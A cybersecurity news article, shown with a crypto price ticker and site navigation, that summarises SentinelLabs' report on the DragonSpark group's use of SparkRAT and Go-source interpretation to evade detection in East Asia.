BTC $58270.6324
ETH $3301.4664
BNB $400.6794
SOL $110.0515
XRP $0.5824
ADA $0.6271
AVAX $39.6830
DOGE $0.0970
TRX $0.1429
wstETH $3808.1443
DOT $8.3586
LINK $19.1334
WETH $3305.4834
MATIC $1.0428
UNI $11.0186
WBTC $57881.0446
IMX $3.3465
ICP $13.0316
BCH $301.2119
LTC $74.8427
CAKE $3.2026
ETC $28.3635
FIL $7.9610
LEO $4.4139
RNDR $7.4060
KAS $0.1700
HBAR $0.1136
DAI $1.0002
ATOM $11.3163
INJ $41.0291
VET $0.0502
TON $2.1419
OKB $51.8401
STX $3.2222
LDO $3.5190
FDUSD $0.9951
XMR $138.3902
XLM $0.1221
ARB $1.8935
NEAR $3.9358
TIA $16.9317
GRT $0.2829
WEMIX $2.2582
ENS $22.5313
MKR $2167.8555
APEX $2.4646
THETA $1.9298
BTC $58270.6324
ETH $3301.4664
BNB $400.6794
SOL $110.0515
XRP $0.5824
ADA $0.6271
AVAX $39.6830
DOGE $0.0970
TRX $0.1429
wstETH $3808.1443
DOT $8.3586
LINK $19.1334
WETH $3305.4834
MATIC $1.0428
UNI $11.0186
WBTC $57881.0446
IMX $3.3465
ICP $13.0316
BCH $301.2119
LTC $74.8427
CAKE $3.2026
ETC $28.3635
FIL $7.9610
LEO $4.4139
RNDR $7.4060
KAS $0.1700
HBAR $0.1136
DAI $1.0002
ATOM $11.3163
INJ $41.0291
VET $0.0502
TON $2.1419
OKB $51.8401
STX $3.2222
LDO $3.5190
FDUSD $0.9951
XMR $138.3902
XLM $0.1221
ARB $1.8935
NEAR $3.9358
TIA $16.9317
GRT $0.2829
WEMIX $2.2582
ENS $22.5313
MKR $2167.8555
APEX $2.4646
THETA $1.9298
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Unknown malware terrorizes gambling companies


    Cybersecurity researchers SentinelLabs report that the Chinese-speaking group DragonSpark used Golang source code interpretation to avoid detection when conducting spy attacks against organizations in East Asia.

    The attack vector for cybercriminals is vulnerable MySQL database servers available on the Internet. Attackers gain access to vulnerable MySQL and web server endpoints by deploying web shells through SQL injection, cross-site scripting, or web server vulnerabilities.

    The attackers then deploy SparkRAT, a Golang-based open source tool that can run on Windows, macOS, Linux and offers remote access features. SparkRAT supports 26 commands received from the C&C server (C2) to perform the following actions:

    • Remotely execute PowerShell and Windows system commands;
    • Manage Windows features and force shutdown, restart or suspend processes;
    • Downloading, uploading or deleting files;
    • Collection of system and confidential information and its transfer to C&C;
    • Capturing the screen and sending it to the attacker's server;
    • Make lateral movement.

    SparkRAT uses the WebSocket protocol to communicate with the C&C server and can be automatically updated to add new features all the time.

    In addition to SparkRAT, hackers also use the SharpToken and BadPotato tools to escalate privileges and the GotoHTTP tool to establish persistence on a compromised system.

    The campaign is different in that it uses interpretations of Golang source code (using the Yaegi tool) to execute code from Go scripts embedded in malware binaries. This allows hackers to execute code without first compiling it to avoid static analysis.

    This Go script is also used to open a Reverse Shell so that attackers can connect to it using Metepreter to execute code remotely. This method is quite complex but effective static analysis method because most security programs only evaluate the behavior of the compiled code, not the source code.

    All of the open-source tools used by DragonSpark were developed by Chinese developers, indicating links between cybercriminals and the country. DragonSpark used compromised networks in Taiwan, Hong Kong, China and Singapore belonging to gambling companies, art galleries, travel agencies and schools.

    Author DeepWeb
    75,000 WordPress websites vulnerable to hacker attacks
    North Korean hackers exploit Zimbra mail server vulnerability in their 'No Pineapple' malware campaign

    Comments 0

    Add comment